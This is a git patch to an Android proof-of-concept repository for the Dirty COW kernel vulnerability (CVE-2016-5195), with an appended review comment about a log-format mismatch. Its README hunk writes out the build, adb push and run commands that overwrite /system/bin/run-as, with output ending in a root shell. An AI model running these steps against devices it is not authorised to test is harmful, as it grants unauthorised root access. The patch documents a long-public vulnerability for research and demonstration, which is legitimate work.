From d794acf0a98894c24a73655e2db8ab4573a861ec Mon Sep 17 00:00:00 2001
From: Tim
Date: Mon, 19 Dec 2016 22:03:39 +0800
Subject: [PATCH] update Readme.md
---
 README.md | 61 ++++++++++++++++++++++++++++++++++++------------------
 dirtycow.c | 2 +-
 2 files changed, 42 insertions(+), 21 deletions(-)
diff --git a/README.md b/README.md
index 9a9c8f5..9dd9bb8 100644
--- a/README.md
+++ b/README.md
@@ -1,32 +1,53 @@
 # CVE-2016-5195
 CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android
+This repository demonstrates the vulnerability on vulnerable Android devices attached via ADB.
+It does not disable SELinux (see https://github.com/timwr/CVE-2016-5195/issues/9) or install superuser on the device.
+
 ```
+
 $ make root
-ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk
-make[1]: Entering directory `./CVE-2016-5195'
+ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
+make[1]: Entering directory '/home/user/dev/git/exploits/CVE-2016-5195'
+[arm64-v8a] Install : dirtycow => libs/arm64-v8a/dirtycow
+[arm64-v8a] Install : run-as => libs/arm64-v8a/run-as
+[x86_64] Install : dirtycow => libs/x86_64/dirtycow
+[x86_64] Install : run-as => libs/x86_64/run-as
+[mips64] Install : dirtycow => libs/mips64/dirtycow
+[mips64] Install : run-as => libs/mips64/run-as
+[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
+[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
 [armeabi] Install : dirtycow => libs/armeabi/dirtycow
 [armeabi] Install : run-as => libs/armeabi/run-as
-make[1]: Leaving directory `./CVE-2016-5195'
-adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
-[100%] /data/local/tmp/dirtycow
-adb push libs/armeabi/run-as /data/local/tmp/run-as
+[x86] Install : dirtycow => libs/x86/dirtycow
+[x86] Install : run-as => libs/x86/run-as
+[mips] Install : dirtycow => libs/mips/dirtycow
+[mips] Install : run-as => libs/mips/run-as
+make[1]: Leaving directory '/home/user/dev/git/exploits/CVE-2016-5195'
+adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
+[100%] /data/local/tmp/dcow
+adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
 [100%] /data/local/tmp/run-as
-adb shell 'chmod 777 /data/local/tmp/run-as'
-adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
-warning: new file size (9464) and file old size (17944) differ
-
-size 17944
+adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
+dcow /data/local/tmp/run-as /system/bin/run-as
+warning: new file size (17944) and file old size (5544) differ
-
-[*] mmap 0xb51e5000
-[*] exploit (patch)
-[*] currently 0xb51e5000=464c457f
-[*] madvise = 0xb51e5000 17944
-[*] madvise = 0 1048576
-[*] /proc/self/mem 1635778560 1048576
-[*] exploited 0xb51e5000=464c457f
+[*] size 5544
+[*] mmap 0xb536b000
+[*] currently 0xb536b000=464c457f
+[*] madvise = 0xb536b000 5544
+[*] madvise = 0 0
+[*] /proc/self/mem 5544 1
+[*] exploited 0xb536b000=464c457f
 adb shell /system/bin/run-as
-running as uid 2000
+uid /system/bin/run-as 2000 uid 0
+0 u:r:runas:s0
+context 0 u:r:shell:s0
+/system/bin/sh: can't find tty fd: No such device or address
+/system/bin/sh: warning: won't have full job control
+shamu:/ # id
+uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
+shamu:/ #
+
 ```
diff --git a/dirtycow.c b/dirtycow.c
index ad14c39..c09665a 100644
--- a/dirtycow.c
+++ b/dirtycow.c
@@ -167,7 +167,7 @@ int dcow(int argc, const char * argv[])
 size_t size = st2.st_size;
 if (st2.st_size != st.st_size) {
- LOGV("warning: new file size (%lld) and file old size (%lld) differ\n", (unsigned long long)st.st_size, (unsigned long long)st2.st_size);
+ LOGV("warning: new file size (%lld) and destination file size (%lld) differ\n", (unsigned long long)st2.st_size, (unsigned long long)st.st_size);
 if (st2.st_size > st.st_size) {
 LOGV("corruption?\n");
 }
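Review bot: The rewritten LOGV line in dirtycow.c still pairs `%lld` with arguments cast to `unsigned long long`, which is a format/argument type mismatch (the removed line had the same one); the conversion should match the casts, `LOGV("warning: new file size (%llu) and destination file size (%llu) differ\n", (unsigned long long)st2.st_size, (unsigned long long)st.st_size);`, or alternatively cast to `long long` and keep `%lld`. Swapping st2 and st also changes which file each number describes, and the sample output in the README hunk of this same commit still reads "file old size", so it appears to have been captured with the previous wording and may mislead readers comparing numbers. The `size = st2.st_size` context line above the warning suggests st2 is the size used afterwards; a one-line comment naming which argv entry st and st2 were stat'ed from would make the message and the "corruption?" check easier to verify, e.g. `/* st2: size of the replacement file (argv[1]); st: size of the file being overwritten (argv[2]) -- confirm against the fstat calls */`. dcow begins and ends outside this hunk.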